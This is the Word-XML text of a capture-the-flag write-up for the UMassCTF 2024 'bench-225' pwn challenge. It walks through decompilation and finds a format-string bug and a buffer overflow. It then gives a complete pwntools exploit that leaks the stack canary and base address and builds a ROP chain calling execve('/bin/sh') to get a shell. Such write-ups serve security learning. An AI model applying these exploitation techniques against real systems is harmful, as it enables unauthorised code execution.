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071" w:rsidRDefault="002B1071" w:rsidP="002B1071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02"/>
        <w:gridCol w:w="7342"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B1071" w:rsidTr="002B107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71" w:rsidRDefault="002B1071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2B1071" w:rsidRDefault="002B1071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2B1071" w:rsidTr="002B107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B1071" w:rsidRDefault="002B1071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2B1071" w:rsidTr="002B1071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71" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071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2B107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71" w:rsidRDefault="002B1071" w:rsidP="002B1071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UMassCTF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B1071" w:rsidTr="002B1071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71" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071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2B107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71" w:rsidRDefault="002B1071" w:rsidP="002B1071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2B1071">
              <w:t>bench-225</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B1071" w:rsidTr="002B1071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71" w:rsidRDefault="002B1071" w:rsidP="002B1071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71" w:rsidRDefault="002B1071" w:rsidP="002B1071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Pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidTr="002B1071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71" w:rsidRDefault="002B1071" w:rsidP="002B1071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71" w:rsidRDefault="002B1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https://ctftime.org/event/2287/tasks/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B1071" w:rsidTr="002B107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B1071" w:rsidRDefault="002B1071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2B1071" w:rsidRPr="002B1071" w:rsidTr="002B107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B1071" w:rsidRDefault="002B1071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1F2328"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B1071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Life is one big tug of war. And you don't win the war by pushing the rope.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B1071" w:rsidTr="002B107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B1071" w:rsidRDefault="002B1071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2B1071" w:rsidTr="002B107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B1071" w:rsidRDefault="002B1071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2B1071" w:rsidRPr="002B1071" w:rsidTr="002B107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Life is one big tug of war. And you don’t win the war by pushing the rope.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The user is presented with a binary file </w:t>
            </w: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bench-225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bench-225: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,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BuildID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[sha</w:t>
            </w:r>
            <w:proofErr w:type="gram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1]=</w:t>
            </w:r>
            <w:proofErr w:type="gram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385df5c5d03be2e2d41d84bc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0c0cf98ef8b322f0, for GNU/Linux 3.2.0, not stripped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First of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart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all</w:t>
            </w:r>
            <w:proofErr w:type="gram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 let’s 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checksec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the binary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Arch:     amd64-64-little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RELRO:    Full RELRO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Stack:    Canary found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NX:       NX enabled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PIE:      PIE enabled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As we can see, all protections are enabled. And let’s check if there are any interesting ROP gadgets using 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ropper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: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...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0x0000000000001332: pop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rax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; ret; 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0x0000000000001207: pop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rbp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; add byte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ptr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 [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rax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], al; test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rax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,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rax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; je 0x1218;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jmp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rax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; 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0x0000000000001248: pop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rbp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; add byte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ptr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 [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rax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], al; test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rax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,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rax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; je 0x1258;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jmp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rax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; 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0x0000000000001293: pop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rbp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; ret; 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0x0000000000001334: pop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rbx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; ret; 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0x000000000000133c: pop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rcx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; ret; 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0x000000000000100c: pop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rdi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; add byte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ptr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 [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rax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], al; test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rax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,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rax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; je 0x1016; call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rax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; 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0x0000000000001336: pop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rdi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; ret; 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0x0000000000001338: pop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rdx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; ret; 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0x000000000000133a: pop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rsi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; ret;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...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0x000000000000101a: ret; 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0x000000000000133e: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syscall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; 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0x000000000000133e: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syscall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; ret;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lastRenderedPageBreak/>
              <w:t>It seems that there’s a lot of useful gadgets in this binary. Here’s the program running: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/  |                                    /  |              /      \  /      \ /       | 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$$ |____    ______   _______    _______ $$ |____         /$$$$$$  |/$$$$$$  |$$$$$$$/  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$$      \  /      \ /       \  /       |$$      \  ______$$____$$ |$$____$$ |$$ |____  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$$$$$$$  |/$$$$$$  |$$$$$$$  |/$$$$$$$/ $$$$$$$  |/      |/    $$/  /    $$/ $$      \ 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$$ |  $$ |$$    $$ |$$ |  $$ |$$ |      $$ |  $$ |$$$$$$//$$$$$$/  /$$$$$$/  $$$$$$$  |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$$ |__$$ |$$$$$$$$/ $$ |  $$ |$$ \_____ $$ |  $$ |       $$ |_____ $$ |_____ /  \__$$ |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$$    $$/ $$       |$$ |  $$ |$$       |$$ |  $$ |       $$       |$$       |$$    $$/ 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$$$$$$$/   $$$$$$$/ $$/   $$/  $$$$$$$/ $$/   $$/        $$$$$$$$/ $$$$$$$$/  $$$$$$/   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Grind doesn't stop.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====================================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Name: Gary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Goggins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Goal: 225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lbs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 x 25 reps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Current Weight: 0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Rep: 0/25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Stamina: 140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====================================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Choose an option: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1. Add 10s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2. Add 25s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3. Add 45s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4. Bench  </w:t>
            </w:r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Fonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4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5. Remove Plate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Here’s the </w:t>
            </w:r>
            <w:proofErr w:type="gram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main(</w:t>
            </w:r>
            <w:proofErr w:type="gram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)</w:t>
            </w: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function:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)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/* WARNING: Switch with 1 destination removed at 0x001015f9 *//* WARNING: Exceeded maximum restarts with more pending */ void main(void) {  long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in_FS_OFFSET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;  undefined4 local_14;  undefined8 local_10;    local_10 = *(undefined8 *)(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in_FS_OFFSET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+ 0x28);  local_14 = 0;  puts(" __                                      __                ______    ______   _______  ");  puts("/  |                                    /  |              /      \\  /      \\ /       | ");  puts("$$ |____    ______   _______    _______ $$ |____         /$$$$$$  |/$$$$$$  |$$$$$$$/  ");  puts("$$      \\  /      \\ /       \\  /       |$$      \\  ______$$____$$ |$$____$$ |$$ |____  "      );  puts("$$$$$$$  |/$$$$$$  |$$$$$$$  |/$$$$$$$/ $$$$$$$  |/      |/    $$/  /    $$/ $$      \\ ");  puts("$$ |  $$ |$$    $$ |$$ |  $$ |$$ |      $$ |  $$ |$$$$$$//$$$$$$/  /$$$$$$/  $$$$$$$  |");  puts("$$ |__$$ |$$$$$$$$/ $$ |  $$ |$$ \\_____ $$ |  $$ |       $$ |_____ $$ |_____ /  \\__$$ |");  puts("$$    $$/ $$       |$$ |  $$ |$$       |$$ |  $$ |       $$       |$$       |$$    $$/ ");  puts("$$$$$$$/   $$$$$$$/ $$/   $$/  $$$$$$$/ $$/   $$/        $$$$$$$$/ $$$$$$$$/  $$$$$$/  ");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putchar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(10);  puts("Grind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doesn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\'t stop.");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putchar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(10);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g_Barbell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= 0;  DAT_00107092 = 0xe1;  DAT_0010709a = 0x8c;  DAT_00107094 = 0x13b;  DAT_00107098 = 0x19;  DAT_00107096 = 0;  do {    puts("====================================");    puts("Name: Gary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Goggins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");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printf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("Goal: %d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lbs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x %d reps\n",(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ulong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)DAT_00107092,(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ulong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)DAT_00107098);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printf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("Current Weight: %d\n",(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ulong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)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g_Barbell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);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printf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("Rep: %d/%d\n",(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ulong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)DAT_00107096,(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ulong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)DAT_00107098);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printf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("Stamina: %d\n",(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ulong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)DAT_0010709a);    puts("====================================");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putchar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(10);    puts("Choose an option:");    puts("1. Add 10s"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);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puts("2. Add 25s"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);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puts("3. Add 45s"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);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puts("4. Bench"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);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puts("5. Remove Plate"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);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if ((DAT_0010709a &lt; 0x32) &amp;&amp; (DAT_00107092 &lt;=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g_Barbell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)) {      puts("6. Motivational Quote"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);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}    __isoc99_scanf(&amp;DAT_001034bf,&amp;local_14);                    /* WARNING: Could not find normalized switch variable to match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jumptable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*/                    /* WARNING: This code block may not be properly labeled as switch case */    puts("Invalid choice.");  } while( true );}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As we can see in the code above, there’s a hidden option </w:t>
            </w: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6</w:t>
            </w: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, it becomes visible only when a certain condition is met, using the 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printf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lines we can rename the variables into more meaningful names</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)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lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    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>puts(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"====================================");    puts("Name: Gary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Goggins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");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printf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("Goal: %d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lbs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x %d reps\n",(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ulong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)goal,(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ulong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)reps);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printf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("Current Weight: %d\n",(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ulong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)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current_weight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);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printf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("Rep: %d/%d\n",(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ulong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)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current_reps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,(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ulong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)reps);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printf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("Stamina: %d\n",(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ulong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)stamina);    puts("====================================");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putchar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(10);    puts("Choose an option:");    puts("1. Add 10s"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);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puts("2. Add 25s"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);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puts("3. Add 45s"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);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puts("4. Bench"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);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puts("5. Remove Plate"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);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if ((stamina &lt; 0x32) &amp;&amp; (goal &lt;=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current_weight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)) {      puts("6. Motivational Quote"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);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}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So, basically if we want to show the sixth option, we need to have </w:t>
            </w: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stamina</w:t>
            </w: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smaller than 50 and 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current_weight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bigger than the goal.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="a3"/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b/>
                <w:bCs/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TIP</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:spacing w:before="0" w:beforeAutospacing="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When </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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Ghidra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 displays warnings indicating potential issues with the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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decompilation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 of a specific function, it’s advisable to inspect the disassembly window. In cases where certain bytes are not disassembled and are labeled as </w:t>
            </w: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??</w:t>
            </w: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, you can force </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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Ghidra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 to disassemble them by pressing the letter </w:t>
            </w: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D</w:t>
            </w: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 or selecting “Disassemble” from the context menu. Afterward, refreshing the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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decompilation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 window can help ensure a more accurate representation of the code.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Here’s the decompiled </w:t>
            </w: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switch</w:t>
            </w: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that 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Ghidra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failed to decompile at first, I’ve also renamed some functions for readability:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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>switch(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>*(undefined4 *)(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unaff_RBP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+ -0xc)) {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>default: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puts("Invalid choice.");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break;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>case 1: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add_10s();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break;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>case 2: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add_25s();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break;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>case 3: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add_45s();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break;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>case 4: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if (stamina == 0) {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>puts("You are too tired to continue.");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}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else {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>bench();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}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break;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>case 5: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printf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("\x1b[2J");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puts("Weakness is a choice.");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break;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>case 6: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tab/>
              <w:t xml:space="preserve">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goto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code_r0x00101677;}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Now it makes sense to go check the </w:t>
            </w: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motivation</w:t>
            </w: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 function, as it was the hidden option, so here’s the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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decompilation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 of it:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)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void motivation(void) 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{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int</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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;  long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in_FS_OFFSET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;  char local_18 [8];  long local_10;    local_10 = *(long *)(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in_FS_OFFSET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+ 0x28);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memset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(local_18,0,8);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printf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("Enter your motivational quote: ");  do {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getchar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();    if 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== 10) break;  } while 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!= -1);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fgets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(local_18,1000,stdin);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printf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("\x1b[2J");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printf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("Quote: \"");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printf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(local_18);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printf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("\" - Gary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Goggins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");  // redacted ...  if (local_10 == *(long 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>*)(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>in_FS_OFFSET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+ 0x28)) {    return;  }                    /* WARNING: Subroutine does not return */  __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stack_chk_fail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();}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The </w:t>
            </w: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motivation</w:t>
            </w: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function appears to have a buffer overflow vulnerability due to the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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fgets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(</w:t>
            </w:r>
            <w:proofErr w:type="gram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local_18, 1000, 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stdin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);</w:t>
            </w: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line, as well as a format string vulnerability caused by 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printf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(local_18);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Upon analyzing the binary, the initial plan was to exploit the format string vulnerability to leak the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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libc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 address and then construct a ROP chain to execute </w:t>
            </w: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/bin/sh</w:t>
            </w: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. But we lacked information about the specific </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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libc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 version used on the remote server. This made it difficult to determine the correct addresses even if we successfully leaked some. Since only the binary was </w:t>
            </w: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lastRenderedPageBreak/>
              <w:t>provided without any additional details, we needed to devise an alternative strategy.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The revised plan involved the following steps:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
              <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
            </w:pPr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Uncover the hidden </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:eastAsiaTheme="minorHAnsi" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>motivation</w:t>
            </w:r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 option.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
            </w:pPr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Leak the base address of the executable to establish a reference point.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
              <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
            </w:pPr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Directly read </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:eastAsiaTheme="minorHAnsi" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:eastAsiaTheme="minorHAnsi" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 from standard input (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:eastAsiaTheme="minorHAnsi" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>stdin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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) into a writable address within the binary.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
              <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
            </w:pPr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Utilize the leaked base address and the ROP gadgets within the binary to call the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:eastAsiaTheme="minorHAnsi" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>execve</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 system call with the address of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:eastAsiaTheme="minorHAnsi" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:eastAsiaTheme="minorHAnsi" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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, enabling us to spawn a shell.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To reveal the hidden option, we must manipulate the weight and stamina values within the program. Since the goal weight is 225 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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lbs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 and we have the options to add 10s, 20s, or 45s, we choose to add 5 of the 45s plates, which corresponds to option 3 in the program:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)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for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in 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>range(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5):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io.recvuntil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(b"5. Remove Plate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")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(b"3")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Next, we need to set the stamina value to be less than 50. To achieve this, we repeatedly use the “bench” option (option 4) six times:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)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for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in 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>range(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6):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io.recvuntil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(b"5. Remove Plate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")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(b"4")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The next step in the exploit involves extracting crucial data from the program’s memory, such as the canary value, the base address of the ELF binary, and a writable memory address. I utilized the format string vulnerability to accomplish this task and created a simple function for easier implementation:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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def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leak_address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(offset):    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>io.recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>(b"6. Motivational Quote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")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(b"6") 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io.recvuntil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b"Enter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your motivational quote:")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(f"%{offset}$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p".encode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("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ascii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"))     address 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int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io.recvuntil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(b" - Gary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Goggins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").split(b":")[1].replace(b"\"", b"").replace(b"\n", b"").split(b"-")[0].strip(), 16)    return address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This function allows us to specify an offset and retrieve the corresponding memory address by leveraging the format string vulnerability in the program.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After that we can leak the addresses and the canary as follows:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)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canary 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leak_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>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>33)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log.success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f"canary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: 0x{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canary:x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}")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elf.address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leak_address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(17) -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elf.symbols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['main']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log.success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f"elf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base: 0x{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elf.address:x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}")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writable_address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elf.address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+ 0x7150log.success(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f"writable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address: 0x{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writable_address:x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}")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lastRenderedPageBreak/>
              <w:t>After obtaining the leaked addresses, we’re now ready for the next phase, which involves writing to the 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writable_address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 location. The rationale behind this step is that we lack information about the specific </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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libc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 version used on the remote server. Therefore, we opt to utilize ROP gadgets available within the binary itself to spawn a shell. However, to achieve this, we must store the string </w:t>
            </w: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/bin/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sh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in a location within memory.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="a3"/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b/>
                <w:bCs/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TIP</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:spacing w:before="0" w:beforeAutospacing="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You can use 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gdb-pwndbg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with the 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vmmap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command to locate a writable address. Simply look for any address that is marked with the write flag, and you can select that as your writable location.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Since we already acquired the base address of the binary, we can identify a writable location and utilize it as the storage for </w:t>
            </w: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/bin/sh</w:t>
            </w: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. To accomplish this, we initiate the first payload, which calls the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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syscall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</w:t>
            </w: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read</w:t>
            </w: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to read from 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stdin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, enabling us to write into the writable address:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)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# first stage ---------------------------------------------payload = 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>flat(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>[        cyclic(8),        p64(canary),        cyclic(8),        p64(RET),        p64(POP_RSI),        p64(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writable_address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),        p64(POP_RDI),        p64(0),        p64(POP_RDX),        p64(0xff),        p64(POP_RAX),        p64(0), # read        p64(SYSCALL),        p64(RET),        p64(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elf.symbols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['motivation'])    ])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io.recvuntil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(b"6. Motivational Quote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>")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>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(b"6")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io.recvuntil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b"Enter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your motivational quote:")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io.clean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()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(payload)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(b"/bin/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sh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\x00")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Once the </w:t>
            </w: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/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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is stored, we’ll proceed by sending the second payload, which will grant us a shell:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)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payload = 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>flat(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>[        cyclic(8),        p64(canary),        cyclic(8),        p64(RET),        p64(POP_RDI),        p64(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writable_address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),        p64(POP_RSI),        p64(0),        p64(POP_RDX),        p64(0),        p64(POP_RAX),        p64(0x3b), #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execve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       p64(SYSCALL),    ])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io.recvuntil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b"Enter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your motivational quote:")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()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(payload) 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And here’s the full exploit:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)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from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pwn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import *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def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start(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argv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=[], *a, **kw):    if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args.GDB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:  # Set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GDBscript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below        return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gdb.debug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([exe] +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argv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,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gdbscript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=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gdbscript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, *a, **kw)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elif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args.REMOTE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:  # ('server', 'port')        return remote(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sys.argv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[1],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sys.argv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[2], *a, **kw)    else:  # Run locally        return process([exe] +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argv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, *a, **kw)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gdbscript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= '''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init-pwndbg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'''.format(**locals()) exe = './bench-225'elf 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context.binary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= ELF(exe,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checksec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=False)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context.log_level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= 'info'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= start() # setup the program to get the vulnerable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optionfor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in range(5):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io.recvuntil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(b"5. Remove Plate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")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(b"3") for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in range(6):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io.recvuntil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(b"5. Remove Plate</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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")   </w:t>
            </w:r>
            <w:proofErr w:type="gram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(b"4") # leak addresses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def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leak_address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(offset):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io.recvuntil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(b"6. Motivational Quote")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(b"6") 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io.recvuntil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b"Enter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your motivational quote:")   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(f"%{offset}$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p".encode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("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ascii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"))     address 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int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io.recvuntil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(b" - Gary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Goggins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").split(b":")[1].replace(b"\"", b"").replace(b"\n", b"").split(b"-")[0].strip(), 16)    return address canary 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leak_address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(33)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log.success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f"canary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: 0x{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canary:x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}")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elf.address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leak_address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(17) -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elf.symbols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['main']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log.success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f"elf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base: 0x{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elf.address:x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}")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writable_address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elf.address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+ 0x7150log.success(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f"writable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address: 0x{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writable_address:x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}") # preparing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rop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gadgets ---------------------------------------------POP_RDI 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elf.address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+ 0x0000000000001336POP_RSI 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elf.address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+ 0x000000000000133aPOP_RDX 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elf.address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+ 0x0000000000001338POP_RAX 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elf.address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+ 0x0000000000001332SYSCALL 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elf.address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+ 0x000000000000133eRET     =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elf.address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+ 0x000000000000101a # first stage ---------------------------------------------payload = flat([        cyclic(8),        p64(canary),        cyclic(8),        p64(RET),        p64(POP_RSI),        p64(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writable_address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),        p64(POP_RDI),        </w:t>
            </w:r>
            <w:r w:rsidRPr="002B1071">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>p64(0),        p64(POP_RDX),        p64(0xff),        p64(POP_RAX),        p64(0),        p64(SYSCALL),        p64(RET),        p64(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elf.symbols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['motivation'])    ])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io.recvuntil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(b"6. Motivational Quote")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(b"6")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io.recvuntil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b"Enter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your motivational quote:")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io.clean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()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(payload)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(b"/bin/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sh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\x00") # Second Stage ---------------------------------------------payload = flat([        cyclic(8),        p64(canary),        cyclic(8),        p64(RET),        p64(POP_RDI),        p64(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writable_address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),        p64(POP_RSI),        p64(0),        p64(POP_RDX),        p64(0),        p64(POP_RAX),        p64(0x3b),        p64(SYSCALL),    ])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io.recvuntil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b"Enter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 your motivational quote:")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()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io.sendline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(payload)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io.clean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 xml:space="preserve">() # Got </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002B1071">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Shell?io.interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002B1071">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="a3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The </w:t>
            </w:r>
